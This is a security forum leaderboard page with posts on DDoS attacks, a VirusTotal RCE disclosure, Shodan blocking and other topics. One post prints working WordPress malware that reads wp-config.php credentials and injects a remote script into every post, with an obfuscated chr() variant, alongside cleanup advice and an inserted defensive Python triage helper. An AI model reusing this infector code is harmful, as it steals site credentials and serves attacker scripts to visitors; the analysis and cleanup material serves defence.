Leaderboard

Popular Content

Showing content with the highest reputation since 04/18/22 in all areas

  1. After deep security research by the Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within the VirusTotal platform and gain access to its various scan capabilities.

     About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed.

     Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload:

     Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to the CVE-2021-22204 information, instead of exiftool detecting the metadata of the file it executes our payload, handing us a reverse shell on our machine.

     After that we noticed that it's not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges.

     Hosts identified within the internal network:

     The interesting part is that every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So not only did we have an RCE, but it was also forwarded by Google's servers to Google's internal network, its customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc.

     Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, logs, etc. We reported all the findings to Google, which fixed this issue quickly.

     Disclosure Process:
     - Report received by GoogleVRP - 04.30.2021
     - GoogleVRP trigged the report - 05.19.2021
     - GoogleVRP accepted the report as a valid report - 21.05.2021
     - GoogleVRP closed the report - 04.06.2021
     - Virustotal was no longer vulnerable - 13.01.2022
     - GoogleVRP allowed publishing - 15.01.2022

     Source: https://www.cysrc.com/blog/virus-total-blog
    8 points
  2. True, one day there were 3000+, another day 11,000+. I think RST has had "much heavier attacks", and they were solved instantly with iptables -j DROP. They should talk to the people who handle the hosting for eMAG and other services on Black Friday.
    7 points
  3. Well, and what about budgets for their relatives' companies? They're not looking for solutions, man. They're looking to hand out contracts and milk money.
    5 points
  4. The government sites are useless anyway. You could even say they are sites used for fraud, given how much the rotten Romanian state steals from you. ♥️ my Russian brothers!
    5 points
  5. What are we going to do, guys, psd.ro and a few other crappy sites went down around 7 in the morning; any day now they'll attack the Luca pretzel shop too, ffs. 1990 called, they want their packets back.
    5 points
  6. This is a course on how to get your house to catch fire. No code or standard of any kind is followed there. Is that an electrical installation, or is he working in his mother's barn :))))
     - The conductors all look to be 1.5 mm
     - The breakers are 16 AMP, curve C (for inductive loads, not resistive ones, which is what most things in a house are). Domestic installations use curve A or B. It makes sense: you have curve C because an inductive load draws up to 6 times its current at start-up (that breaker will trip at 60 amps, by which time the whole installation, done with 1.5 mm cross-section, will be burning in flames)
     - There is no residual-current (differential) breaker of any kind
     - He filled more than 70% of the box with them.
     - Stranded conductors are not stripped with a utility knife
     - Tinning conductors is forbidden in electrical installations. Special Wago-type connectors are used there (the connection is made mechanically; otherwise that solder will flow at the first overload, and the contact surface is ~0.3 mm, no matter how many times the jerk twists it)
     - On top, he put wires between the breakers instead of a busbar (9 breakers of 16 amps on a single 1.5 mm conductor)
    5 points
  7. It's from the "Elementor" plugin. Here is the source that "infests" the toys:

     ```php
     <?php
     error_reporting(0);
     ini_set('display_errors', 0);
     ini_set('max_execution_time', 0);
     echo "ssqqss>>>";
     $d = $_SERVER['DOCUMENT_ROOT'] . "/";
     $files = array();
     // Look for wp-config.php under the document root and two levels above it (via find)
     for ($i = 0;$i < 3;$i++) {
         try {
             $az = shell_exec('find ' . $d . ' -name "wp-config.php"');
             $az2 = explode("\n", $az);
             foreach ($az2 as $file) {
                 $fil = explode("/wp-config.php", $file);
                 $fil = $fil[0] . "/wp-config.php";
                 array_push($files, $fil);
             }
             $d = $d . "../";
         } catch(Exception $e) { }
     }
     // Same search again, this time with PHP's own directory iterators
     $l = "/";
     for ($i = 0;$i < 3;$i++) {
         try {
             $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
             $display = Array( 'php' );
             $search = Array( 'wp-config.php' );
             $files_ar = array();
             foreach (new RecursiveIteratorIterator($it) as $file) {
                 if (strpos($file->getFilename() , 'wp-config.php') !== false) {
                     array_push($files, $file->getPathname());
                 }
             }
             $l .= "../";
         } catch(Exception $e) { }
     }
     $files = array_unique($files);
     foreach ($files as $file) {
         make_index_blog($file);
     }
     die();

     function get_var_reg($pat, $text) {
         if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
             return $matches[1][0];
         }
         return "";
     }

     function getijstonemoretime($path) { }

     function make_index_blog($path) {
         echo "iii->>try:" . $path . "<br />";
         $az = shell_exec('cat ' . $path);
         if (strpos($az, "DB_PASSWORD") !== false) { } else { }
         if (strpos($az, "DB_PASSWORD") !== false) {
             sqldo($az);
         }
     }

     function sqldo($content) {
         $siteurl = "null";
         if (strpos($content, "DB_NAME") !== false) {
             // Database credentials are pulled out of the wp-config.php contents
             $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
             $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
             $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
             $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
             $conn = new mysqli($host, $user, $pass);
             if ($conn->connect_error) {
                 echo $conn->connect_error;
             } else {
                 $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'";
                 $result = $conn->query($q) or die($conn->error);
                 while ($row = $result->fetch_assoc()) {
                     $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'");
                     if ($result5->num_rows > 0) {
                         $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 ";
                         $result2 = $conn->query($q2) or var_dump($conn->error);
                         while ($row2 = $result2->fetch_assoc()) {
                             $val = $row2['option_value'];
                             $siteurl = $val;
                             echo "iii->>find222:" . $siteurl . "<br />";
                             if (strpos($siteurl, "://") !== false) {
                                 $k = file_get_contents($siteurl);
                                 if (strpos($k, "legendarytable") !== false) {
                                     echo "iii->>contains:" . $siteurl . "<br />";
                                 } else {
                                     $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'";
                                     $result9 = $conn->query($q9) or die($conn->error);
                                     while ($row9 = $result9->fetch_assoc()) {
                                         $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 ";
                                         $result8 = $conn->query($q8) or var_dump($conn->error);
                                         while ($row8 = $result8->fetch_assoc()) {
                                             $val8 = $row8['post_content'];
                                             if (strpos($val8, "legendarytable") === false) {
                                                 // The script tag is appended to every post that does not contain it yet
                                                 $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'";
                                                 $conn->query($q3);
                                                 echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                             } else {
                                                 echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                             }
                                         }
                                     }
                                 }
                             }
                         }
                     }
                 }
             }
             $conn->close();
         }
         return $siteurl;
     }

     function search_file_index($dir, $file_to_search) {
         $files = @scandir($dir);
         if ($files == false) {
             $dir = substr($dir, 0, -3);
             if (strpos($dir, '../') !== false) {
                 search_file_index($dir, $file_to_search);
                 return;
             }
             if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
                 search_file_index($dir, $file_to_search);
                 return;
             }
         }
         foreach ($files as $key => $value) {
             $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
             if (!is_dir($path)) {
                 if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
                     make_index_upload($path);
                 }
             } else if ($value != "." && $value != "..") {
                 search_file_index($path, $file_to_search);
             }
         }
     }
     ```

     In the files, another version (the one with the cookie check) looks like this:

     ```php
     $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104);
     if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).
     chr(45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).
     chr(108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).
     chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).
     chr(101).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).
     chr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).
     chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).
     chr(105).chr(112).chr(116).chr(62);}
     ```

     To verify the checksums of the core files, I recommend wp-cli. Example:

     ```
     ./wp --allow-root core verify-checksums
     Warning: File doesn't verify against checksum: wp-login.php
     Warning: File doesn't verify against checksum: wp-admin/index.php
     Warning: File doesn't verify against checksum: wp-admin/admin.php
     Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php
     Warning: File should not exist: wp-admin/try.php
     Error: WordPress installation doesn't verify against checksums.
     ```

     It should come out roughly like this:

     ```
     ./wp --allow-root core verify-checksums
     Success: WordPress installation verifies against checksums.
     ```

     The scripts also need to be removed from the posts (wp_posts). They can be identified very easily with a MySQL query:

     ```sql
     select * from wp_posts where post_content like '%news.js%';
     ```

     It can also be removed from wp_posts using replace. Note here that there can be several versions. You can extend the search to %script% and/or legendarytable and then run replace on whatever is needed:

     ```sql
     update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", "");
     ```

     There is yet another version that installs 2 plugins (inactive) through which they can run various things. Another version checks cookies. Where cookies exist, it does not redirect to another site. It targets only new visitors, whom it redirects.

     Advice:
     1. Stop installing every crappy plugin out there
     2. Use Content-Security-Policy, ffs! :)))
    4 points
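A triage helper for the cleanup described in post 7 above, added here as an example; it is not part of the original post or of wp-cli. It decodes `chr()` concatenation chains like the cookie-check variant (tolerating the whitespace that line-wrapping inserts) and lists `<script src>` hosts outside an allowlist in both decoded PHP strings and exported `post_content` rows; all sample inputs, host names and function names are constructed for the illustration.

```python
import re
from urllib.parse import urlparse

# One chr(N) call. Stray whitespace inside the token is tolerated because
# line-wrapping in forum posts and logs often splits "chr" or the number.
CHR_CALL = re.compile(r"c\s?h\s?r\s*\(\s*(\d[\d\s]*)\)", re.I)
# Four or more chr() calls joined by PHP's "." concatenation operator.
CHR_RUN = re.compile(r"(?:c\s?h\s?r\s*\(\s*\d[\d\s]*\)\s*\.?\s*){4,}", re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")


def decode_chr_chains(php_source):
    """Return the plain strings hidden in chr(..).chr(..) chains, in file order."""
    decoded = []
    for run in CHR_RUN.finditer(php_source):
        codes = [int(re.sub(r"\s", "", m.group(1)))
                 for m in CHR_CALL.finditer(run.group(0))]
        decoded.append("".join(chr(c % 256) for c in codes))  # PHP chr() wraps mod 256
    return decoded


def script_hosts(html):
    """Host names of every external <script src=...>; relative paths are ignored."""
    hosts = set()
    for m in SCRIPT_SRC.finditer(html):
        host = urlparse(m.group(1)).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def triage(php_files, posts, allowed_hosts):
    """php_files: {path: source}; posts: [(id, post_content)].
    Returns (location, kind, detail) tuples for a human to review."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path, source in php_files.items():
        for text in decode_chr_chains(source):
            if IDENTIFIER.match(text):
                # A function name built from chr() and called through a variable
                findings.append((path, "hidden-callable", text))
            for host in sorted(script_hosts(text) - allowed):
                findings.append((path, "hidden-script-host", host))
    for post_id, content in posts:
        for host in sorted(script_hosts(content) - allowed):
            findings.append((f"post:{post_id}", "unexpected-script-host", host))
    return findings


# ---- constructed sample data (not taken from any real site) ----
def php_chr_chain(text):
    """Build a chr() chain so the sample can be read in the source."""
    return ".".join(f"chr({ord(c)})" for c in text)


SAMPLE_TAG = ("<script src='https://injected.example.invalid/news.js' "
              "type='text/javascript'></script>")
SAMPLE_PHP = (
    "<?php $v=" + php_chr_chain("preg_match") + "; "
    "if(!$v(" + php_chr_chain("#wordpress_logged_in#i")
    + ",implode(\" \",array_keys($_COOKIE)))){echo "
    # Simulate wrap damage: "c hr(115)" and "chr(10 1)"
    + php_chr_chain(SAMPLE_TAG).replace("chr(115)", "c hr(115)", 1)
                               .replace("chr(101)", "chr(10 1)", 1)
    + ";}"
)
SAMPLE_POSTS = [
    (1, "<p>Hello</p><script src='/wp-includes/js/jquery/jquery.min.js'></script>"),
    (2, "<p>News</p>" + SAMPLE_TAG),
    (3, "<script src=\"https://cdn.example.org/lib.js\"></script>"),
]

if __name__ == "__main__":
    for finding in triage({"wp-content/sample.php": SAMPLE_PHP},
                          SAMPLE_POSTS, {"cdn.example.org"}):
        print(*finding, sep="\t")
```

The allowlist is the set of script hosts the site is expected to load, the same list a Content-Security-Policy `script-src` directive would carry.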
  8. "SEARCH AT THE HOME OF A PERSON SUSPECTED OF INVOLVEMENT IN THE RECENT CYBER ATTACKS

     Starting on 29 April this year, a series of DDoS (Distributed Denial of Service) cyber attacks affected multiple websites belonging to public institutions and private organizations in Romania. The attacks were reportedly claimed by a group calling itself 'KillNet', of Russian origin, and its activity is reportedly promoted on various communication channels, being motivated by the context of the Russia - Ukraine military conflict.

     Immediately after these attacks, specialists from the Ministry of Internal Affairs, the General Directorate for Internal Protection, the General Inspectorate of the Romanian Police, as well as from the other structures and institutions of the defense, public order and national security system, carried out specific activities within their remit to counter the attacks, protect the targeted sites and identify those responsible, in order to ensure the resilience of IT infrastructures.

     Following the joint activities, a suspect was identified, a Romanian citizen resident in the United Kingdom, who allegedly supported the activity of the criminal group by helping to translate from Russian into Romanian the materials promoted by the criminal group and by pointing out websites in Romania that could be attacked using the same modus operandi.

     On 2 May 2022, following international police cooperation, law enforcement authorities in the United Kingdom, through the National Crime Agency, carried out a house search in the United Kingdom at the residence of the Romanian citizen suspected of involvement in the cyber attacks of recent days on the IT infrastructure in Romania.

     In addition, specialized officers from IGPR - Directorate for Combating Organized Crime - Cybercrime Service travelled to the United Kingdom to provide support in the investigation conducted by the National Crime Agency."

     Source: Romanian Police

     Personally I think they're wasting their time taking down the parties' sites.... exactly what tex said too, who cares about these sites?
    4 points
  9. Despite the old saying, not everything lives forever on the internet — including stolen crypto.

     This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED.

     “Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED,” BlockSec said on Twitter this week.

     The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used.

     “Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited,” BlockSec said in a following tweet.

     Possible Vigilante

     The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it’s possible the hacker did this on purpose. BlockSec isn’t sure what the motive was, and suggests it could’ve been an accident.

     A report by VICE published this week says the hacker could’ve been a vigilante with a message or something to prove. Because the self-destruct feature “burned” the tokens, they’re essentially gone forever. VICE suggests the hacker could’ve wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After selling the hacked tokens, YEED’s value crashed to near zero. Sales won’t resume until ZEED takes steps to secure, repair and test its systems.

     Maybe the hacker messed up, or maybe we just witnessed a modern day Robin Hood attack. It’s possible we’ll never know who pulled off the hack, or why.

     Source: https://futurism.com/the-byte/hacker-steals-destroys

     Dorel, what have you done..... 😂
    4 points
  10. Hi, I would also recommend SaaS for small shops, at least at the start, until things stabilize. I know someone who decided to move from Magento to Shopify, and it was one of the best decisions. The costs of hosting, maintenance and constant updates (there were security problems too; it had to be investigated, rebuilt, backups, etc.) were the main reason for the migration. Now everything is simpler, with no headaches. Card payments, easy administration, the Shopify API has everything you need, fewer worries. Overall, the costs are lower in the long run. Of course, for large shops with IT departments, the situation changes. Personally, that is when I would think about moving off SaaS; there are enough services/tools for migrating later from Shopify to Magento and the rest.
    4 points
  11. It would be cool to be able to tag the police on the forum. And the SRI guys too, who come in here like cockroaches around the district-heating pipes :))))))
    3 points
  12. Meanwhile, educated Romania: https://www.romaniatv.net/primarie-din-valcea-datoare-la-trupa-de-lautari-se-vand-microbuzele-scolare-pentru-plata-sumei-uriase-altfel-nu-putem_6455043.html
    3 points
  13. Last time, it was someone from Mediafax who managed the feed. All of Yahoo Romania runs on connections; support has nothing to do with it.
    3 points
  14. By the same logic by which you lose your age if you lose your ID card.
    3 points
  15. The Blowjob script got activated :)))) What morons, man
    2 points
  16. You bastards, that's why I got a fine for parking my car wrong; you couldn't get at me on the forum, so you burned me on parking.
    2 points
  17. Good idea. With the GeoIP module for Apache:

      ```apache
      GeoIPEnable On
      # God screw you all, and we're rid of the trouble :))
      SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry
      <RequireAll>
          Require all granted
          Require not env BlockCountry
      </RequireAll>
      ```
    2 points
  18. You can fingerprint his browser and block him specifically. There is https://fingerprintjs.com/; on the free plan you get 20k IDs per month, more than enough. There are also other alternatives such as https://github.com/mattbrailsford/imprintjs. Implementing something similar yourself isn't worth the effort.
    2 points
  19. I'm curious, is there anyone here who has looked a bit at the "patched firehoses" on the net for Xiaomi phones? The firehose is a part of the firmware that prevents you from flashing in EDL (Emergency Download Mode) if you don't have authorization from Xiaomi, at least from what I understand of the field; correct me if I'm wrong.

      Anyway, the point is that many "patched" firehoses have appeared on the internet for certain Xiaomi phones. If you replace the firmware's original firehose with the patched one that the Indian guy on YouTube gives you, then you'll be able to flash in EDL without having an authorized Xiaomi account. Unfortunately, only older or cheaper phones have patched firehoses. For one reason or another, the recent ones (like the Mi 11) don't.

      This measure seems outrageous to me on Xiaomi's part, considering that I bricked my Mi 11 with their *official* update (I'm not joking). After that I bricked it about 2 more times, but that was my fault. To unbrick it I had to pay an Indian guy with access to an authorized account (he probably worked at Xiaomi) 25 euros to resuscitate my phone, because otherwise it was a brick (literally).

      Has anyone else here had similar "adventures" with Xiaomi phones? If so, did you find any way to get through it without paying someone with authorization? And what exactly is the deal with these patched firehoses in the first place?

      Oh, and I hope the 3rd time is the last time I brick the Mi 11. I paid 3000 lei for a phone that bricks itself... I'm definitely not buying Xiaomi again.
    2 points
  20. Joking aside, what is happening is trivial. How can you not protect some sites against a trivial DDoS attack of 3000-5000 bots? There was an article saying that I don't know how many millions of euros were invested in developing the "cyber capital of Europe", a.k.a. Romania. This news got a lot of media coverage, and people who don't have the necessary knowledge are left amazed. It rather lowers our reputation... if the people in charge of those sites had made a little effort they would have found open-source protection solutions on GitHub, but incompetence is at home here... and who the hell would do this for 1500 lei? If you have friends/acquaintances in high positions there, it would be an idea to offer them a topic/section here and help them with an idea or two...
    2 points
  21. And those spam SMS messages, what's the deal with them, where do they get the "sensitive" numbers from, I wonder? :)))))))))
    2 points
  22. In rem: the investigation is opened into the act, not the perpetrators. https://legeaz.net/dictionar-juridic/in-rem
    2 points
  23. "A 'dede o se' attack, as the specialists call it": listen to that, ffs, who pronounces it like that? =)))) They took down the PSD's site lol. DIICOT announced that it has opened a criminal investigation. Hmmm... and how are they going to investigate the Russians?
    2 points
  24. Shodan.io is a search engine with the job of crawling the internet for publicly accessible servers, software, and equipment. Intended as a site for cyber security experts and researchers, Shodan is a popular destination for those with other intentions as well. While not an inherently bad site, a hacker might want to cause some trouble by remotely accessing a web server with default credentials found on Shodan. News stories over the last few years talk about how Shodan has been used to log into traffic light controls, web cameras, and find databases to exploit.

      How do you prevent your network from being scanned and added to Shodan? First you’ll need a router or firewall with more than basic functions. Your device should accept custom firewall rules where you can block by remote IP address. Second you’ll need a list of the servers that Shodan uses to crawl the internet.

      Below is a list of known Shodan IP addresses and host names. A firewall rule should be created to block each entry.

      - 93.120.27.62 - m247.ro.shodan.io
      - 85.25.43.94 - rim.census.shodan.io
      - 85.25.103.50 - pacific.census.shodan.io
      - 82.221.105.7 - census11.shodan.io
      - 82.221.105.6 - census10.shodan.io
      - 71.6.167.142 - census9.shodan.io
      - 71.6.165.200 - census12.shodan.io
      - 71.6.135.131 - census7.shodan.io
      - 66.240.236.119 - census6.shodan.io
      - 66.240.192.138 - census8.shodan.io
      - 198.20.99.130 - census4.shodan.io
      - 198.20.70.114 - census3.shodan.io
      - 198.20.69.98 - census2.shodan.io
      - 198.20.69.74 - census1.shodan.io
      - 188.138.9.50 - atlantic.census.shodan.io

      If you have a router capable of displaying active sessions or reporting blocked firewall events, you’ll see something like this.

      There are of course a number of things you can do to protect yourself from uninvited internet guests. First and foremost, don’t use default credentials for your router, server, database, IP camera, etc. These devices are incredibly easy to find through Shodan and there is never an excuse for defaults! You can also set your router to only allow inbound traffic from known IP addresses. Disabling WAN pings is another way you can try and prevent inbound traffic to your network.

      The easiest test is to run a Shodan search against yourself. If you know your external IP address, plug it into Shodan and look at the results. Do you see open ports? Do you have devices that are unsecured or running default credentials? The best solution is not to have public facing devices at all and instead to use a VPN to remotely access equipment, but in some situations that just isn't an option and the firewall rules are a fix.

      There are a number of routers that can provide the necessary firewall capabilities to block sites like Shodan from scanning your network.

      (Blocking a Shodan IP on a Peplink)

      The Pepwave Surf SOHO or Cradlepoint MBR1200B will provide adequate blocking for most homeowners or small businesses. Medium to enterprise size companies will want to look at more capable options like the Peplink Balance 380 or the AER3100.

      SOURCE
    2 points
  25. https://www.insanelyusefulwebsites.com Author: jayra
    2 points
  26. Greetings, does anyone have a contact in the right place for getting the feeds of news sites into ro.yahoo.com? I'm offering 1000 euros, cash down if the deal closes (on completion, like with hookers)
    2 points
  27. First, it's illegal if you don't have any legit authorization to do that. To do that, you must have a knowledge base that is missing from you. If a server (IP) has multiple ports open, it doesn't mean that you can obtain access to the server. To make an idea about the penetration testing process ("infiltrate"), I recommend having a look at Hackthebox and trying to learn how to do reconnaissance, information gathering, exploit, lateral movement, privilege escalation, etc. YouTube may also help.
    2 points
  28. :)))))))))))) Hey man, stop smoking bad stuff before asking something. What do you mean, lose your seniority? There's a field right there with the date the category was obtained, for crying out loud. Did it split in two and you lost only the face, or how the hell did the face get lost while you still have the back? Maybe soak it again
    2 points
  29. 2 points
  30. Good evening, together with some partners I am about to open a company that imports and sells electrical equipment. I'm looking for someone to build and administer the online shop. We prefer to work with WordPress/Joomla/prebuilt e-commerce platforms, and the interested person should have extensive experience in this field (a portfolio is welcome). Experience in SEO and Google/FB ads is a plus. We are interested both in a short collaboration (the initial setup) and in something long-term. Those interested, please send me a PM.
    2 points
  31. The Ministry of Research, Innovation and Digitalization is recruiting IT&C experts to implement the reforms and investments Romania has committed to in this field through the National Recovery and Resilience Plan (PNRR). Salaries are up to 4,000 euros net, and the specialists will be employed until 2026.

      "The Ministry of Research, Innovation and Digitalization (MCID) announces the establishment of the salary scale for staff hired outside the organizational chart, as part of the "Task Force for the Implementation and Monitoring of Reforms and Investments regarding Digital Transformation" (Task Force), from the National Recovery and Resilience Plan (PNRR). The salary scale of this unit, which has a major role in the successful implementation of the digital transformations Romania has committed to, is a competitive one, of up to 4,000 euros net per month, which allows the recruitment of the best specialists, who will be employed until 2026", the ministry says in a press release.

      Candidates for the contractual management position and for the 16 execution positions can submit their file for the selection process until 26 April, with the interviews taking place between 3 and 5 May.

      Open for competition are one contractual management position (one manager post, higher education, 8 h/day working schedule, at Task Force/MCID) and 16 execution positions, namely:
      - executive manager – 1 post
      - implementation expert – 2 posts
      - ICT system architect – 2 posts
      - quality specialist – 1 post
      - cybersecurity expert – 1 post
      - database administrator – 2 posts
      - IT systems engineer – 3 posts
      - ICT business analysis manager – 3 posts
      - software product development engineer (UI/UX) – 1 post

      More details about the posts open for competition (conditions, topics and bibliography) can be consulted HERE.
    2 points
  32. So I take it there were a lot of Romanians on there? Or what's the deal with RO police? 🚨 more info Raid Forums Is Down
    2 points
  33. I don't think you have any idea what the difference between mono and stereo is. Stereo doesn't mean two speakers and that's it. Summary of the gypsy guy on YouTube:
    2 points
  34. https://www.omgubuntu.co.uk/2022/05/nvidia-unexpectedly-announces-open-source-gpu-kernel-modules
    1 point
  35. Wed, May 25, 2022, 3:00 PM - 6:00 PM (your local time)

      To our dearest community: We are very happy to announce that we are restarting our meetup series. As you know, our team cares deeply about sharing information, tooling and knowledge as openly as possible. Therefore, we are proud to be able to have these specialists in cybersecurity share what they have learned on the frontlines:

      18:00 - 18:45 Tiberiu Boros, Andrei Cotaie - Living off the land

      In security, "Living off the Land" (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it's not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no "footprints," such as random binaries or scripts on the system. Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which are an attacker. It's also why static rules can trigger so many false positives and why compromises can go undetected.

      Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them.

      The Threat Hunting team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and we have recently open sourced it to the broader security community. In this webcast you will learn about the LotL Classifier, intended usage and best practices, and how you can obtain and contribute to the project.

      18:50 - 19:35 Ciprian Bejean - Lessons learned when playing with file infectors

      Linkedin: https://www.linkedin.com/events/bsidesbucharestonlinemeetup6927924413371678720/
      Zoom: https://us05web.zoom.us/j/83643751520?pwd=UDU0RVE0UmZjWHN2UnJPR095SUxpQT09
    1 point
  36. For those of you familiar with boolean operators and advanced search modifiers in the likes of Google and Bing (I include Yahoo, Altavista, MSN and Live Search in this as they all run off Bing’s search engine as of last year); you will know that the extremely useful field command “inurl:” does not work in Microsoft’s Bing search engine. Microsoft temporarily suspended support of this field command back in 2007 due to “what appears to be mass automated usage for data mining”. They never brought it back.

      The inurl: field command is used by recruiters and sourcers alike to find public profiles in LinkedIn, search for CVs on the web and generally exploit patterns in web addresses that can lead to candidate information. Google have a virtual monopoly on this as they are the last major search engine left that still allow you to search within the url of a web address. Well, not any more.

      It turns out that Bing does allow you to search within the url of a web page, in fact they have a documented search command that allows you to search within the url, title, meta tags and much more with just one command. This nifty little command is called “instreamset” and allows you to specify key words that you wish to search for within either the url, title, body or anchors of a webpage. In fact it goes one step further and allows you to combine any of these meta tags in your search.

      Here’s an example: if you run the following search in Bing it will look for the letters “recruitment” in either the Title or Url of a web-page:

      instreamset:(url title):recruitment

      If you change this to just instreamset:url:recruitment then Bing will just search the url for these letters. I say letters as, unlike Google, Bing appears to search for the letters rather than treating our search parameter as a whole word. If you run a search for inurl:recruitment in Google, you tend only to see “recruitment” as a whole word in the url, preceded and followed by a special character such as / – . etc. This can be a pain when looking for CVs, for example, as they often appear in urls such as wwww.mycv.com which Google might not prioritise as it sees the whole word “mycv” rather than seeing “cv” as part of that term.

      Thankfully you can also filter words from the url by inserting the negative sign or hyphen in front of instreamset as follows:

      site:linkedin.com -instreamset:url:dir -instreamset:url:groups “java developer”

      In this example Bing filters out directory and group listings from our search for the public profiles of Java Developers.

      When searching for CVs you could run a search for the following when looking for Software Developers in Dublin:

      instreamset:(title url):cv “software developer” dublin -advice -jobs -sample -apply -description -submit

      This works very similarly to a Google search for (inurl:~cv | intitle:~cv) with Bing also searching for synonyms of CV such as resumé and “curriculum vitae”.

      Fundamentally Bing remains weak when it comes to indexing public LinkedIn profiles so it still doesn’t work as well as Google for LinkedIn searches but it does provide a great, comprehensive alternative to Google for finding CVs and other profile searches that would otherwise require a url search.

      Which search engine do you prefer to use and why?

      Source
    1 point
  37. If you have the authorization from the client to do this, then you can see what type of services are running on the open ports and start from there.
    1 point
